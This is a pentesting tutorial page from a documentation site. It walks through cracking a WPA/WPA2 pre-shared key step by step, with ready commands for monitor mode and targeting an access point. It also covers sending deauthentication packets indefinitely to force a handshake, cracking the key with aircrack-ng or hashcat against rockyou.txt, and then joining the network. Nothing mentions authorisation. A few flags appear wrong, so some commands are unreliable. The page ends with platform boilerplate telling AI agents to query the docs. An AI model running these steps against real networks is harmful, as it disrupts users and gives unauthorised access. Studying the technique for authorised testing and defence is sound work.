> For the complete documentation index, see [llms.txt](https://zero-day-archives.gitbook.io/zero-day-archives/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://zero-day-archives.gitbook.io/zero-day-archives/wireless-security/intro-to-wifi-pentesting/wpa-and-wpa2-psk.md).

# WPA & WPA2 PSK

## Cracking WPA/WPA2 with Handshake Capture

In this tutorial, we'll demonstrate how to crack WPA/WPA2 encrypted networks by capturing the 4-way handshake and then using tools like `aircrack-ng` and `hashcat` to crack the password.

### Prerequisites

Ensure you have the following:

* A wireless card that supports monitor mode.
* The necessary tools: `airmon-ng`, `airodump-ng`, `aireplay-ng`, `aircrack-ng`, `hashcat`.
* A wordlist (e.g., `/usr/share/wordlists/rockyou.txt`).

### Step-by-Step Process

#### 1. **Start Interface in Monitor Mode and Kill Unwanted Services**

Start by disabling any interfering processes and putting your wireless interface into monitor mode:

```bash
airmon-ng check kill && airmon-ng start wlan0
```

* `airmon-ng check kill`: Stops interfering processes.
* `airmon-ng start wlan0`: Puts the wireless interface `wlan0` into monitor mode (`wlan0mon`).

#### 2. **Scan for Networks**

Next, scan for nearby wireless networks to identify the one you want to target:

```bash
sudo airodump-ng wlan0mon
```

#### 3. **Scan on Specific AP and Channel with Output File**

Once you've identified the target AP, run `airodump-ng` on the specific network to capture data:

```bash
sudo airodump-ng -bssid <BSSID> -c <Channel> -w <WPA1?> wlan0mon
```

* `<BSSID>`: The MAC address of the target AP.
* `<Channel>`: The channel number on which the AP is operating.
* `<WPA1?>`: The name of the file where you want to save the captured data.

#### 4. **De-Authenticate Clients to Capture Handshake**

In order to capture the 4-way handshake, de-authenticate a connected client using `aireplay-ng`:

```bash
# Remember, you can also refer to another section for deauthenticating all clients
sudo aireplay-ng -a <BSSID> -c <Client Mac> -0 0 wlan0mon
```

* `-a <BSSID>`: The BSSID of the target AP.
* `-c <Client Mac>`: The MAC address of a client connected to the AP.
* `-0 0`: Sends deauthentication packets indefinitely until the handshake is captured.

#### 5. **Crack the WPA/WPA2 Key Using Aircrack-ng**

Once the handshake is captured, use `aircrack-ng` to crack the password:

```bash
sudo aircrack-ng <output_file>.cap -e <ESSID>
```

* `<output_file>.cap`: The capture file containing the handshake.
* `<ESSID>`: The name (SSID) of the target network.

You can also use a wordlist for a more efficient brute-force attack:

```bash
sudo aircrack-ng <output_file>.cap -e <ESSID> -w /usr/share/wordlists/rockyou.txt
```

#### 6. **Crack the WPA/WPA2 Key Using Hashcat**

Alternatively, you can use `hashcat` for cracking the WPA/WPA2 key. First, convert the `.cap` file to a hashcat-compatible format:

```bash
hcxpcapngtool -o <output_file>.hc22000 <output_file>.cap
```

* `<output_file>.cap`: The original capture file.
* `<output_file>.hc22000`: The converted hashcat file.

Next, run `hashcat` to crack the WPA/WPA2 key:

```bash
hashcat -m 22000 <output_file>.hc22000 -w /usr/share/wordlists/rockyou.txt
```

#### 7. **Conclusion**

Once the password is cracked, you should have access to the network. Connecting to the Network:

```bash
wpa_supplicant -c <filename>.conf
```

`<filename>.conf`: The WPA configuration file containing network details.

Request IP from DHCP Server:

```bash
sudo dhclient wlan0 -v
```

By following these steps, you'll be able to crack the WPA/WPA2 password and gain access to the network.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://zero-day-archives.gitbook.io/zero-day-archives/wireless-security/intro-to-wifi-pentesting/wpa-and-wpa2-psk.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.